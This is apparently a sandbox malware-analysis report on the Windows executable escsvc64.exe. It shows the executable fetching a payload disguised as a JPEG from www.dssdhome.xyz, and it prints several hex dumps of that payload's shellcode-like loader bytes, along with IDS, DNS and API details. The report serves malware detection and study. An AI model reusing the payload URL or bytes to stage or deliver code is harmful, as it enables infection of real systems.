ADVAPI32.dll	StartServiceCtrlDispatcherW, RegQueryValueExW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, DeleteService, QueryServiceStatus, ControlService, QueryServiceStatusEx, StartServiceW, OpenServiceW, CloseServiceHandle, CreateServiceW, OpenSCManagerW, SetServiceStatus, RegisterServiceCtrlHandlerExW
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW
ole32.dll	CoCreateInstance, FreePropVariantArray, CoInitialize, CoUninitialize
OLEAUT32.dll	SysFreeString, SysAllocString
PSAPI.DLL	EnumProcesses, EnumProcessModules, GetModuleBaseNameW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T11:21:00.415789+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	169.150.247.36	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 11:20:59.643156052 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:20:59.643202066 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:20:59.643285036 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:20:59.645196915 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:20:59.645212889 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.415667057 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.415788889 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.419940948 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.419951916 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.420274019 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.470489979 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.546308994 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.587341070 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.737413883 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.762896061 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.762917042 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.762955904 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.762976885 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.763016939 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.763031006 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.763045073 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.763083935 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.845555067 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.845583916 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.845635891 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.845649004 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.845679998 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.845685005 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.845714092 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.845740080 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.877780914 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.877846003 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.877878904 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.877916098 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.877953053 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.883723974 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.883774042 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.883784056 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.883954048 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.897049904 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.897106886 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.918770075 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.918838024 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.920691013 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.920763969 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.923336029 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.923401117 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.923542976 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.923621893 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.928560972 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.928646088 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.937874079 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.937949896 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.954567909 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.954637051 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.954652071 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.954715014 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.970592022 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.970657110 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.970674992 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.970712900 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.970746040 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.990451097 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.990499973 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.990541935 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:00.990555048 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:00.990588903 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:01.009849072 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:01.009968996 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:01.010003090 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:01.010045052 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:01.010088921 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:01.011970043 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:01.011995077 CET	443	49733	169.150.247.36	192.168.2.4
Jan 14, 2025 11:21:01.012012005 CET	49733	443	192.168.2.4	169.150.247.36
Jan 14, 2025 11:21:01.012020111 CET	443	49733	169.150.247.36	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 11:20:59.271753073 CET	63860	53	192.168.2.4	1.1.1.1
Jan 14, 2025 11:20:59.636843920 CET	53	63860	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 11:20:59.271753073 CET	192.168.2.4	1.1.1.1	0x70dd	Standard query (0)	www.dssdhome.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 11:20:59.636843920 CET	1.1.1.1	192.168.2.4	0x70dd	No error (0)	www.dssdhome.xyz	mooscc.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 11:20:59.636843920 CET	1.1.1.1	192.168.2.4	0x70dd	No error (0)	mooscc.b-cdn.net		169.150.247.36	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dssdhome.xyz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	169.150.247.36	443	7440	C:\Users\user\Desktop\escsvc64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 10:21:00 UTC	159	OUT	GET /11/xin/escsvc64.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2 Host: www.dssdhome.xyz
2025-01-14 10:21:00 UTC	966	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 10:21:00 GMT Content-Type: image/jpeg Content-Length: 125740 Connection: close Server: BunnyCDN-DE1-1079 CDN-PullZone: 2373567 CDN-Uid: 95780366-96cb-4089-af63-a08b2db1368d CDN-RequestCountryCode: US Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match Cache-Control: max-age=25600000 Last-Modified: Mon, 06 Jan 2025 13:18:01 GMT CDN-StorageServer: DE-1021 CDN-FileServer: 1002 CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 206 CDN-CachedAt: 01/12/2025 11:43:10 CDN-EdgeStorageId: 1082 CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: 59193bdc2570802efdae705a1a8a0d58 CDN-Cache: HIT Accept-Ranges: bytes
2025-01-14 10:21:00 UTC	16384	IN	Data Raw: e8 00 00 00 00 59 49 89 c8 48 81 c1 23 0b 00 00 ba f6 f2 24 c7 49 81 c0 23 eb 01 00 41 b9 04 00 00 00 56 48 89 e6 48 83 e4 f0 48 83 ec 30 c7 44 24 20 05 00 00 00 e8 05 00 00 00 48 89 f4 5e c3 48 8b c4 48 89 58 08 44 89 48 20 4c 89 40 18 89 50 10 55 56 57 41 54 41 55 41 56 41 57 48 8d 6c 24 90 48 81 ec 70 01 00 00 45 33 ff c7 45 d8 6b 00 65 00 48 8b f1 4c 89 7d f8 b9 13 9c bf bd 4c 89 7d c8 4c 89 7d 08 45 8d 4f 65 4c 89 7d 10 44 88 4d bc 44 88 4d a2 4c 89 7d 00 4c 89 7d f0 4c 89 7d 18 44 89 7d 24 44 89 7c 24 2c c7 45 dc 72 00 6e 00 c7 45 e0 65 00 6c 00 c7 45 e4 33 00 32 00 c7 45 e8 2e 00 64 00 c7 45 ec 6c 00 6c 00 c7 44 24 40 53 6c 65 65 c6 44 24 44 70 c7 44 24 58 4c 6f 61 64 c7 44 24 5c 4c 69 62 72 c7 44 24 60 61 72 79 41 c7 44 24 48 56 69 72 74 c7 44 24 Data Ascii: YIH#$I#AVHHH0D$ H^HHXDH L@PUVWATAUAVAWHl$HpE3EkeHL}L}L}EOeL}DMDML}L}L}D}$D\|$,ErnEelE32E.dEllD$@SleeD$DpD$XLoadD$\LibrD$`aryAD$HVirtD$
2025-01-14 10:21:00 UTC	16384	IN	Data Raw: ff ff ff 48 8b de 48 8b f0 eb 0d 8b 0d 87 8f 01 00 33 d2 e8 14 35 00 00 48 8b cb e8 68 3f 00 00 8b cf ff 15 c0 e0 00 00 48 8b c6 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc 48 83 ec 28 48 8d 0d b1 fe ff ff e8 08 34 00 00 89 05 46 8f 01 00 83 f8 ff 74 25 48 8d 15 2a a0 01 00 8b c8 e8 c7 34 00 00 85 c0 74 0e c7 05 8d a0 01 00 fe ff ff ff b0 01 eb 07 e8 08 00 00 00 32 c0 48 83 c4 28 c3 cc 48 83 ec 28 8b 0d 0a 8f 01 00 83 f9 ff 74 0c e8 04 34 00 00 83 0d f9 8e 01 00 ff b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 4d 63 48 1c 4d 8b d0 48 8b 01 41 8b 04 01 83 f8 fe 75 0b 4c 8b 02 49 8b ca e8 8a 00 00 00 48 83 c4 28 c3 cc 40 53 48 83 ec 20 4c 8d 4c 24 40 49 8b d8 e8 e5 ee ff ff 48 8b 08 48 63 43 1c 48 89 4c 24 40 8b 44 08 04 48 83 c4 20 5b c3 cc cc cc 48 63 52 Data Ascii: HH35Hh?HH\$0Ht$8H _H(H4Ft%H*4t2H(H(t4H(H(McHMHAuLIH(@SH LL$@IHHcCHL$@DH [HcR
2025-01-14 10:21:00 UTC	14625	IN	Data Raw: 20 5f c3 48 85 c0 74 e4 4c 8b 40 08 4d 85 c0 74 db 49 83 f8 05 75 0a 4c 89 48 08 41 8d 40 fc eb cd 49 83 f8 01 75 05 83 c8 ff eb c2 48 8b 6b 08 48 89 73 08 83 78 04 08 0f 85 b9 00 00 00 48 83 c1 30 48 8d 91 90 00 00 00 eb 08 4c 89 49 08 48 83 c1 10 48 3b ca 75 f3 81 38 8d 00 00 c0 8b 7b 10 74 7a 81 38 8e 00 00 c0 74 6b 81 38 8f 00 00 c0 74 5c 81 38 90 00 00 c0 74 4d 81 38 91 00 00 c0 74 3e 81 38 92 00 00 c0 74 2f 81 38 93 00 00 c0 74 20 81 38 b4 02 00 c0 74 11 81 38 b5 02 00 c0 8b d7 75 40 ba 8d 00 00 00 eb 36 ba 8e 00 00 00 eb 2f ba 85 00 00 00 eb 28 ba 8a 00 00 00 eb 21 ba 84 00 00 00 eb 1a ba 81 00 00 00 eb 13 ba 86 00 00 00 eb 0c ba 83 00 00 00 eb 05 ba 82 00 00 00 89 53 10 b9 08 00 00 00 49 8b c0 e8 f6 82 00 00 89 7b 10 eb 0f 8b 48 04 4c 89 48 08 49 Data Ascii: _HtL@MtIuLHA@IuHkHsxH0HLIHH;u8{tz8tk8t\8tM8t>8t/8t 8t8u@6/(!SI{HLHI
2025-01-14 10:21:00 UTC	2896	IN	Data Raw: 48 85 c0 75 21 4c 8d 0d 87 94 00 00 33 c9 4c 8d 05 7a 94 00 00 48 8d 15 7b 94 00 00 e8 be fd ff ff 48 85 c0 74 09 48 83 c4 28 e9 98 4a 00 00 b8 01 00 00 00 48 83 c4 28 c3 cc cc 48 ff 25 7d 68 00 00 cc 48 ff 25 8d 68 00 00 cc 48 ff 25 75 68 00 00 cc 48 8b 05 c5 55 01 00 48 ff e0 cc cc 48 ff 25 69 68 00 00 cc 48 ff 25 71 68 00 00 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 50 4c 8b 15 0d 56 01 00 41 8b d9 49 8b f8 8b f2 48 8b e9 49 83 fa ff 74 7f 4d 85 d2 75 26 4c 8d 0d 20 94 00 00 4c 8d 05 11 94 00 00 48 8d 15 12 94 00 00 41 8d 4a 12 e8 21 fd ff ff 4c 8b d0 48 85 c0 74 54 48 8b 8c 24 a0 00 00 00 44 8b cb 8b 84 24 88 00 00 00 4c 8b c7 48 89 4c 24 40 8b d6 48 8b 8c 24 98 00 00 00 48 89 4c 24 38 48 8b 8c 24 90 00 00 00 48 89 4c 24 30 48 8b cd Data Ascii: Hu!L3LzH{HtH(JH(H%}hH%hH%uhHUHH%ihH%qhH\$Hl$Ht$WHPLVAIHItMu&L LHAJ!LHtTH$D$LHL$@H$HL$8H$HL$0H
2025-01-14 10:21:00 UTC	2896	IN	Data Raw: cb e8 19 0a 00 00 4c 8b cd 44 8b c7 48 8b d6 8b c8 e8 75 2e 00 00 3b f8 74 0a f0 83 4b 14 10 83 c8 ff eb 12 8b 43 14 90 c1 e8 02 a8 01 74 05 f0 83 63 14 fd 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 60 48 83 65 c0 00 48 8b d9 83 3d 97 1e 01 00 00 c6 45 d0 00 c6 45 e8 00 c6 45 f0 00 c6 45 f8 00 75 10 0f 10 05 2a 0c 01 00 c6 45 e8 01 f3 0f 7f 45 d8 48 85 db 75 0b 33 c9 e8 c5 fe ff ff 8b f8 eb 32 48 8d 55 c0 e8 18 ff ff ff 85 c0 74 05 83 cf ff eb 20 8b 43 14 90 c1 e8 0b a8 01 74 13 48 8b cb e8 5c 09 00 00 8b c8 e8 01 25 00 00 85 c0 75 dd 33 ff 80 7d e8 02 75 0b 48 8b 45 c0 83 a0 a8 03 00 00 fd 80 7d f0 00 74 0f 8b 5d ec 48 8d 4d c0 e8 b4 b1 ff ff 89 58 20 80 7d f8 00 74 0f 8b 5d f4 Data Ascii: LDHu.;tKCtc3H\$0Hl$8Ht$@H _H\$H\|$UHH`HeH=EEEEu*EEHu32HUt CtH\%u3}uHE}t]HMX }t]
2025-01-14 10:21:00 UTC	2896	IN	Data Raw: 00 00 e8 08 04 00 00 48 8b 8b e0 00 00 00 e8 04 ca ff ff 48 8b 8b f8 00 00 00 e8 f8 c9 ff ff 48 8b 83 00 01 00 00 48 85 c0 74 47 83 38 00 75 42 48 8b 8b 08 01 00 00 48 81 e9 fe 00 00 00 e8 d4 c9 ff ff 48 8b 8b 10 01 00 00 bf 80 00 00 00 48 2b cf e8 c0 c9 ff ff 48 8b 8b 18 01 00 00 48 2b cf e8 b1 c9 ff ff 48 8b 8b 00 01 00 00 e8 a5 c9 ff ff 48 8b 8b 20 01 00 00 e8 a5 00 00 00 48 8d b3 28 01 00 00 bd 06 00 00 00 48 8d 7b 38 48 8d 05 da 00 01 00 48 39 47 f0 74 1a 48 8b 0f 48 85 c9 74 12 83 39 00 75 0d e8 6a c9 ff ff 48 8b 0e e8 62 c9 ff ff 48 83 7f e8 00 74 13 48 8b 4f f8 48 85 c9 74 0a 83 39 00 75 05 e8 48 c9 ff ff 48 83 c6 08 48 83 c7 20 48 83 ed 01 75 b1 48 8b cb 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f e9 1e c9 ff ff cc cc 48 85 c9 74 Data Ascii: HHHHtG8uBHHHH+HH+HH H(H{8HH9GtHHt9ujHbHtHOHt9uHHH HuHH\$0Hl$8Ht$@H _Ht
2025-01-14 10:21:00 UTC	5792	IN	Data Raw: bc cc 20 02 00 00 48 ff c1 48 89 4c 24 20 4c 3b ed 0f 83 f3 fd ff ff 4c 8b fd e9 68 fd ff ff 48 8b b4 24 30 04 00 00 48 8b ac 24 38 04 00 00 48 8b 9c 24 40 04 00 00 48 8b bc 24 28 04 00 00 48 8b 8c 24 10 04 00 00 48 33 cc e8 08 43 ff ff 48 81 c4 48 04 00 00 41 5f 41 5e 41 5d 41 5c c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 45 33 d2 49 8b d8 4c 8b da 4d 85 c9 75 31 48 85 c9 75 31 48 85 d2 74 14 e8 24 bc ff ff bb 16 00 00 00 89 18 e8 5c 9f ff ff 44 8b d3 48 8b 5c 24 30 41 8b c2 48 8b 74 24 38 48 83 c4 20 5f c3 48 85 c9 74 d4 4d 85 db 74 cf 4d 85 c9 75 05 44 88 11 eb d9 48 85 db 75 05 44 88 11 eb bb 48 2b d9 48 8b d1 4d 8b c3 49 8b f9 49 83 f9 ff 75 14 8a 04 13 88 02 48 ff c2 84 c0 74 b1 49 83 e8 01 75 ee eb 2e 8a 04 13 48 8b f7 88 02 48 ff c2 84 c0 74 Data Ascii: HHL$ L;LhH$0H$8H$@H$(H$H3CHHA_A^A]A\H\$Ht$WH E3ILMu1Hu1Ht$\DH\$0AHt$8H _HtMtMuDHuDH+HMIIuHtIu.HHt
2025-01-14 10:21:00 UTC	5792	IN	Data Raw: 48 89 84 24 60 14 00 00 4c 63 d2 48 8b d9 49 8b c2 45 8b f1 48 c1 f8 06 48 8d 0d 28 f5 00 00 41 83 e2 3f 4d 03 f0 4d 8b f8 49 8b f8 48 8b 04 c1 4b 8d 14 d2 4c 8b 64 d0 28 33 c0 48 89 03 89 43 08 4d 3b c6 0f 83 d2 00 00 00 4c 8d 4c 24 50 49 3b fe 73 2c 0f b7 07 48 83 c7 02 66 83 f8 0a 75 0a 66 41 c7 01 0d 00 49 83 c1 02 66 41 89 01 49 83 c1 02 48 8d 84 24 f8 06 00 00 4c 3b c8 72 cf 48 83 64 24 38 00 48 8d 44 24 50 48 83 64 24 30 00 4c 8d 44 24 50 4c 2b c8 c7 44 24 28 55 0d 00 00 48 8d 84 24 00 07 00 00 49 d1 f9 33 d2 48 89 44 24 20 b9 e9 fd 00 00 e8 f6 c1 ff ff 8b e8 85 c0 74 51 33 f6 85 c0 74 38 83 64 24 40 00 48 8d 94 24 00 07 00 00 48 83 64 24 20 00 4c 8d 4c 24 40 8b ce 44 8b c5 48 03 d1 44 2b c6 49 8b cc ff 15 ca 2c 00 00 85 c0 74 1b 03 74 24 40 3b f5 Data Ascii: H$`LcHIEHH(A?MMIHKLd(3HCM;LL$PI;s,HfufAIfAIH$L;rHd$8HD$PHd$0LD$PL+D$(UH$I3HD$ tQ3t8d$@H$Hd$ LL$@DHD+I,tt$@;
2025-01-14 10:21:00 UTC	2896	IN	Data Raw: b7 0a 66 89 08 c3 90 8b 0a 44 0f b7 42 04 44 0f b6 4a 06 89 08 66 44 89 40 04 44 88 48 06 c3 4c 8b 02 8b 4a 08 44 0f b7 4a 0c 4c 89 00 89 48 08 66 44 89 48 0c c3 0f b7 0a 44 0f b6 42 02 66 89 08 44 88 40 02 c3 90 4c 8b 02 8b 4a 08 44 0f b6 4a 0c 4c 89 00 89 48 08 44 88 48 0c c3 4c 8b 02 0f b7 4a 08 4c 89 00 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 4e 8d 0c 02 48 3b ca 4c 0f 46 c9 49 3b c9 0f 82 3f 04 00 00 83 3d 40 c6 00 00 03 0f 82 e2 02 00 00 49 81 f8 00 20 00 00 76 16 49 Data Ascii: fDBDJfD@DHLJDJLHfDHDBfD@LJDJLHDHLJLfHLJLHLJLHDBfD@DBD@HHI woBoTBTNH;LFI;?=@I vI
2025-01-14 10:21:00 UTC	2896	IN	Data Raw: 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 8a 26 ff ff 90 48 83 c4 30 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 98 2b ff ff 83 78 30 00 7e 08 e8 8d 2b ff ff ff 48 30 48 83 c4 30 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 5b 85 ff ff cc 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 45 85 ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 48 8b 09 48 83 c4 20 5d e9 2b 85 ff ff cc 40 55 48 83 ec 20 48 8b ea 48 89 4d 28 48 8b 01 8b 08 89 4d 24 33 c0 81 f9 63 73 6d e0 0f 94 c0 89 45 20 8b 45 20 48 83 c4 20 5d c3 cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 58 8b 09 48 83 c4 20 5d e9 e4 84 ff ff cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 68 8b 09 48 83 c4 20 5d e9 ca 84 ff ff cc 40 55 48 83 ec 20 48 8b ea b9 05 00 00 00 48 83 c4 Data Ascii: ]@UH0H&H0]@UH0H+x0~+H0H0]@UH H3H ][@UH H3H ]E@UH HHMHH ]+@UH HHM(HM$3csmE E H ]@UH HHMXH ]@UH HHMhH ]@UH HH

Target ID:	0
Start time:	05:20:58
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\escsvc64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\escsvc64.exe"
Imagebase:	0x140000000
File size:	144'560 bytes
MD5 hash:	525EA9523A2AFE76D2EAEBC4A6B923EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:21:00
Start date:	14/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7440 -s 420
Imagebase:	0x7ff635bb0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	22.9%
Total number of Nodes:	398
Total number of Limit Nodes:	5

Executed Functions

Function 00450040 Relevance: 55.3, APIs: 6, Strings: 25, Instructions: 1047memorylibraryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE ref: 00450377
VirtualAlloc.KERNELBASE ref: 004503C0
LoadLibraryA.KERNELBASE ref: 00450648
SleepEx.KERNELBASE ref: 004506DB
VirtualProtect.KERNELBASE ref: 004508BB
RtlAddFunctionTable.KERNEL32 ref: 00450941

Strings

hIns, xrefs: 00450132
Slee, xrefs: 004500CF
GetN, xrefs: 0045014E
tion, xrefs: 00450140
p, xrefs: 004500D7
ativ, xrefs: 00450156
ncti, xrefs: 00450184
Libr, xrefs: 004500E4
truc, xrefs: 00450139
ddFu, xrefs: 0045017D
Cach, xrefs: 00450147
temI, xrefs: 00450165
eSys, xrefs: 0045015E
RtlA, xrefs: 00450176
lloc, xrefs: 00450104
Virt, xrefs: 0045010C
onTa, xrefs: 0045018B
Virt, xrefs: 004500F4
ualP, xrefs: 00450114
aryA, xrefs: 004500EC
rote, xrefs: 0045011C
ualA, xrefs: 004500FC
ct, xrefs: 00450124
Flus, xrefs: 0045012B
Load, xrefs: 004500DC

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoLibraryLoadNativeProtectSleepSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$onTa$p$rote$temI$tion$truc$ualA$ualP
API String ID: 1082286156-924545899
Opcode ID: ba67eb782131c3f065ce6fb0f8a316021b757953efe746a7c66d5e51c776329b
Instruction ID: 4b877a474c9715c2d276260203bc0ad77e6aa320a981a279a42016251bc6a765
Opcode Fuzzy Hash: ba67eb782131c3f065ce6fb0f8a316021b757953efe746a7c66d5e51c776329b
Instruction Fuzzy Hash: 38620D74614B098FD719DF18C8856BAB7E1FB94305F14462EDC8BC7216DB38E846CB8A

Function 00000001400032A0 Relevance: 12.2, APIs: 8, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00000001400032BB
GetProcessHeap.KERNEL32 ref: 00000001400032C2
HeapAlloc.KERNEL32 ref: 00000001400032D3
GetVersionExA.KERNEL32 ref: 0000000140003316
GetProcessHeap.KERNEL32 ref: 0000000140003320
HeapFree.KERNEL32 ref: 000000014000332E
GetProcessHeap.KERNEL32 ref: 0000000140003352
HeapFree.KERNEL32 ref: 0000000140003360

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: 08338c099bac06f54d88c59f1c918d076a1e8d62e458aef75d7556fa01c796ee
Instruction ID: ff0c295640f5b83f1606a13dac472acdbcc50a6aea1cbc63b0c003526a08d6e8
Opcode Fuzzy Hash: 08338c099bac06f54d88c59f1c918d076a1e8d62e458aef75d7556fa01c796ee
Instruction Fuzzy Hash: 1C717AB1A0064186F7A7EB73B8517EA2299BB8C7C4F044039FB458B2F2EF798941C741

Function 0000000140007450 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

